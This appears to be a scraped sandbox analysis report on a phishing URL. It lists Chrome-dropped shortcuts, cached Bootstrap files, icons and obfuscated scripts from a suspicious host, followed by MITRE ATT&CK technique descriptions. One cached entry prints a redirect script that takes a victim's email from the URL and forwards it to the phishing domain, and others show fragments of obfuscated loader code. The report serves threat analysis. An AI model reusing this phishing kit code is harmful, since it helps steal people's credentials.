Preview:	L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I^Y]j....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Yjj....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V^Yjj....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V^Yjj...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 12:19:22 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.985143043043729
Encrypted:	false
SSDEEP:
MD5:	C13154327192FF601400D6FB3F1D8114
SHA1:	AD762B0C5405B904B65E75F6F1EC3C5403DB78A4
SHA-256:	133CD24E6540E730F4CF5794B088123F966C445FF88052EB67BC4223FEB82601
SHA-512:	B876231699A86CBC820A5B622755BCC42E98097B09CFFDC636BB424FB7A05572B722DD1C0D8864932B281C1206D331BDD04A7EF8CB039ABF5F9F1CFEFE0C4476
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......U.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I^Y]j....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Yjj....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V^Yjj....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V^Yjj...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V^Ylj.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 12:19:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9745713335923094
Encrypted:	false
SSDEEP:
MD5:	40F98800FAD0253EEC1A462A8D37D046
SHA1:	CABCE713C005B6365A8113C525DC78041F99E26F
SHA-256:	877CE897BAC11F3617A411973DB9B17600AF07D645B2A5EA856E7CD9F105282E
SHA-512:	D6CE4D48CF64BFCF3B857E83C33A44B3AE686385682230F9F9FF42E97C6D8DC5C8A0E39BEE11648E4802E95A606C3C4AE9F294780BA2D1BA71CEEEEA2691F610
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....b..U.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I^Y]j....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Yjj....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V^Yjj....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V^Yjj...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V^Ylj.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 12:19:22 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.986499878127641
Encrypted:	false
SSDEEP:
MD5:	AD15FB51AC5372EC2784679C7BF38AFC
SHA1:	869DC87FD3F75EDB9C223E3D3A1468BB3CEF98F3
SHA-256:	58F918213EBF0D82FDE6EDF3D83C16D1E7B03C68203D0FEE755540722C16EAEF
SHA-512:	0563C0B1F9D60E4824EFA4AD1D9782744B802397D82376EBC6037BBE21B0A0E56D54EDDC3A080A59359F62D28AEB645BC533490E02C7042B93C7FC2BE6036D69
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....d..U.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I^Y]j....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Yjj....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V^Yjj....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V^Yjj...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V^Ylj.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	426355
Entropy (8bit):	4.912224246528829
Encrypted:	false
SSDEEP:
MD5:	E05F0C0603EA36FDA2F26E329B994FE8
SHA1:	B9DF4A8E9119457CCED8B77607E98561E48ABC67
SHA-256:	E50720CEBCF4CF488A8C86EBDC38969DB72CF6BEDCB8E84405159343549CDDB1
SHA-512:	0FCBDFCC864CAE33DAE59AC24D6BC56452D1E68C4347B76456379686A70077EA4EB88CE28A0E04D3E5C0AACDDAB3C4488A29B27C65D4BA54A3013EEA0F56D49F
Malicious:	false
Reputation:	unknown
URL:	https://spos3cu7ia.mutienuial.shop/m/aty/OL4GDVEQ91XGOWM2XPWTAJRM4
Preview:	function _0x49b429(_0x13321f,_0x2c20c7,_0x5c0056,_0x3818ef,_0x2df98e){return _0xa6a8(_0x3818ef- -0x30e,_0x2df98e);}(function(_0x3e4334,_0x1580f7){var _0x2a0896=_0x3e4334();function _0x3007b2(_0x44daf3,_0xca3662,_0x130911,_0x53577b,_0x1fe554){return _0xa6a8(_0xca3662-0x29,_0x130911);}function _0x465ad5(_0x1ae45f,_0xeeec23,_0x29f1db,_0xb9a73f,_0x1eb118){return _0xa6a8(_0x1ae45f-0x153,_0x29f1db);}function _0x3b19cd(_0x55502c,_0x4d137c,_0x66957f,_0x345c2a,_0x5af1c9){return _0xa6a8(_0x55502c-0x1e1,_0x5af1c9);}function _0x54200c(_0x3d0a5b,_0x508025,_0x5bb75a,_0x272da6,_0x5c29d0){return _0xa6a8(_0x3d0a5b- -0x2fd,_0x508025);}function _0x30f7ef(_0x2dd25b,_0x11eff8,_0x4474d9,_0x42d7cc,_0x3fa1e2){return _0xa6a8(_0x4474d9-0x3c5,_0x2dd25b);}while(!![]){try{var _0xe3473=-parseInt(_0x30f7ef(0x8bb,0x1f5,0x719,0x78f,0x72c))/(-0x15ee+0x1ebd+-0x8ce)(parseInt(_0x465ad5(0x7ab,0x6dc,0xb9c,0x9a9,0x3eb))/(0x18330x1+-0x1350+-0x10x4e1))+-parseInt(_0x54200c(0xdc,0x3ca,0x42,0x5c5,0xbe))/(-0x138f0x1+-0x12a2+-0

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (567), with CRLF line terminators
Category:	downloaded
Size (bytes):	6341
Entropy (8bit):	5.114798851154897
Encrypted:	false
SSDEEP:
MD5:	FF6058356639256BF8831A9163C23D1E
SHA1:	77470FA9FDCC214A296B75A0519E50F789C08EE0
SHA-256:	2D0A6DCBDA10E51E78FA4BA5DA72473C28F9073B0DF7C59F7549AB55E48A94CB
SHA-512:	1DD14258725EC9F72B6F47589599D57CF72D482B7F473C12ABDBEC2C5632BF3EA24CE62AE5B55A4BEC148824B9C5AA979F7A6CE383C6EC42C36F53789587EC97
Malicious:	false
Reputation:	unknown
URL:	https://spos3cu7ia.mutienuial.shop/m/cxx/BJZI8F0TBZ4TT6A9THI3365MO
Preview:	{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}..:before,*:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}...form-group{margin-bottom:12px;}...c_loadingDots{line-height:0;white-space:nowrap;position:relative;visibility:hidden;}..div.c_loadingDots.c_dotsPlaying{visibility:visible;}..div.c_loadingDots div.c_loadingDot{position:absolute;left:0;bottom:0;}..div.c_loadingDots div.c_loadingFallback{position:absolute;left:0;top:0;width:100%;height:100%;background:transparent url('https://acctcdn.msauth.net/images/clear1x1.png') no-repeat center center;opacity:1;filter:alpha(opacity=100);-moz-animation:hidedotsfallback .3s linear .1s 1 normal;-ms-animation:hidedotsfallback .3s linear 0s 1 normal;-webkit-animation:hidedotsfallback .3s linear 0s 1 normal;animation:hidedotsfallback .3s linear 0s 1 normal;-moz-animation-fill-mode:both;-ms-animation-fill-mode:both;-webkit-animation-fill-mode:both;animation-fill-mode:both;}..d

Chrome Cache Entry: 78

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	323
Entropy (8bit):	4.694526408175505
Encrypted:	false
SSDEEP:
MD5:	DD47CA76D4EFE98F7517D55DBAE92A42
SHA1:	837E7C806A4D76636D173B5295079B19E0E87496
SHA-256:	89201F506358E4A9E72B19185656ED2500B8CAEEE3A708AE7C30B9D05B93EC43
SHA-512:	7ED8A673A0944CFC7566846E0425645531759FCFF9454CBCCA3D1A15DF8FDB5E9AC1AC213C1CE3C8C55BECF8DC98E944478F729A13EDBB1B83BA4F309C82E263
Malicious:	false
Reputation:	unknown
URL:	https://1lyiqb.recodifyphone.net/
Preview:	<script> .. var gmode ='a';.. var gg ='';.. if(gmode=='a'){.. var hash = window.location.hash;.. cleanhash = hash.replace("#", ""); ..}else{.. .. cleanhash=gg;..}.. .... var linkx="https://spos3cu7ia.mutienuial.shop/?email=";.. window.location.replace(linkx+''+cleanhash);..</script>

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	unknown
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Chrome Cache Entry: 80

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1592
Entropy (8bit):	4.205005284721148
Encrypted:	false
SSDEEP:
MD5:	4E48046CE74F4B89D45037C90576BFAC
SHA1:	4A41B3B51ED787F7B33294202DA72220C7CD2C32
SHA-256:	8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
SHA-512:	B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
Malicious:	false
Reputation:	unknown
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,

Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65299)
Category:	downloaded
Size (bytes):	80663
Entropy (8bit):	5.204798779868606
Encrypted:	false
SSDEEP:
MD5:	6BAF57F25796C332144ED58A2A0CD9EE
SHA1:	F7FD0F3DC84B2CF93BF81E832505A673F354E0A3
SHA-256:	82F64F62BB03C1BC1824B0F9C9E05F70DBA33E146818E63CDF5C306C8CF3DEDD
SHA-512:	5FF6240D9CA34DFE30C9CD95CB5E981823C7C0063CAD9258F8F3A0A24663401DA684844524272410673A6325FD78DB0F7E7D0FCD3844B8DB3EB9AA2613908EE8
Malicious:	false
Reputation:	unknown
URL:	https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js
Preview:	/!. Bootstrap v5.3.2 (https://getbootstrap.com/). * Copyright 2011-2023 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t\|\|self).bootstrap=e()}(this,(function(){"use strict";const t=new Map,e={set(e,i,n){t.has(e)\|\|t.set(e,new Map);const s=t.get(e);s.has(i)\|\|0===s.size?s.set(i,n):console.error(`Bootstrap doesn't allow more than one instance per element. Bound instance: ${Array.from(s.keys())[0]}.`)},get:(e,i)=>t.has(e)&&t.get(e).get(i)\|\|null,remove(e,i){if(!t.has(e))return;const n=t.get(e);n.delete(i),0===n.size&&t.delete(e)}},i="transitionend",n=t=>(t&&window.CSS&&window.CSS.escape&&(t=t.replace(/#([^\s"#']+)/g,((t,e)=>`#${CSS.escape(e)}`))),t),s=t=>{t.dispatchEvent(new Event(i))},o=t=>!(!t\|\|"o

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	199333
Entropy (8bit):	5.013103448858446
Encrypted:	false
SSDEEP:
MD5:	25930B37116B2474777D799979918568
SHA1:	4D0AE3F123CA421EC90EF3348C3B39AC655E9236
SHA-256:	B294D339F709A0620968800517ED512F5EA76A8D06959FF59F6F2EC6F3FDCDB7
SHA-512:	D3DF8EE8C3CEFAB0F214E250A11552A9C94D9374AABB7E745A9271D69C82C04ED7FD525FB0244E1BD9FC24BFCEA7A6F4384BBB86051E84A817BB2413F1017A6E
Malicious:	false
Reputation:	unknown
URL:	https://spos3cu7ia.mutienuial.shop/m/ecpt/KQHLOBFJMGDK98LBHYKKE3LSZ
Preview:	(function(_0x5b1989,_0x4dd8dd){function _0x98c760(_0x5bc066,_0x2bfe8b,_0x3ae5a4,_0xbb2dcc,_0x1155ea){return _0x4e53(_0x5bc066- -0x2df,_0xbb2dcc);}function _0x1ee071(_0x2ccdbb,_0x588cd5,_0x21f614,_0x3e8e2f,_0x4d219a){return _0x4e53(_0x4d219a- -0x223,_0x588cd5);}function _0x397734(_0x341432,_0x204bb2,_0x5f2ec7,_0x4a4c86,_0x361db0){return _0x4e53(_0x204bb2-0x9c,_0x5f2ec7);}function _0x5ee178(_0x31a9bc,_0x5b0a99,_0x45ebe4,_0x2fd736,_0x471b52){return _0x4e53(_0x471b52- -0x106,_0x45ebe4);}function _0x1aee45(_0x3e1555,_0x40a413,_0x1c1268,_0x3e7959,_0x13fc10){return _0x4e53(_0x13fc10- -0x61,_0x40a413);}var _0x250efa=_0x5b1989();while(!![]){try{var _0x5d818c=-parseInt(_0x1ee071(0xa3,-0x21e,-0x25e,-0xd2,-0x100))/(-0x5-0x543+-0x28-0x60+0x11-0x26e)(-parseInt(_0x98c760(0x78,0x123,-0x10f,0x1ed,0x97))/(-0x10x1193+-0x1eb7+0x18260x2))+-parseInt(_0x5ee178(0x6f,0x263,0x1a7,0x8b,0x161))/(-0x1b0d+-0x1fdf+-0x3aef-0x1)(parseInt(_0x1aee45(0x17,0x27c,0x1f6,0x2e2,0x177))/(-0x10x2047+0x2592+0x1-0x547))

Chrome Cache Entry: 87

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	unknown
URL:	https://spos3cu7ia.mutienuial.shop/m/ic/IMA0P42ERZ57WTF2CHC5TMVYG
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 89

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65342)
Category:	downloaded
Size (bytes):	232948
Entropy (8bit):	4.9772469761951434
Encrypted:	false
SSDEEP:
MD5:	CD822B7FD22C8A95A68470C795ADEA69
SHA1:	1F139981B9B47A766EFA0A61BB78ADA351F16C4B
SHA-256:	3017DF4A76DB5F01C2B99B603D88B03106DF13BCFE18E67B7C13C2341D3A67DF
SHA-512:	6F641C4B94AC03CB59A1D703B464442E21AFE5268A4A4D6F0C70DA41175AD21B4F61667AD38EA5AF7909E5B00041DA55DA6980FF8BF4C1017D33253AFE90C802
Malicious:	false
Reputation:	unknown
URL:	https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css
Preview:	@charset "UTF-8";/!. Bootstrap v5.3.2 (https://getbootstrap.com/). * Copyright 2011-2023 The Bootstrap Authors. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root,[data-bs-theme=light]{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-rgb:220,

Static File Info

⊘No static file info

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://1lyiqb.recodifyphone.net/#john.smith@ups.com

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Boot Survival

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

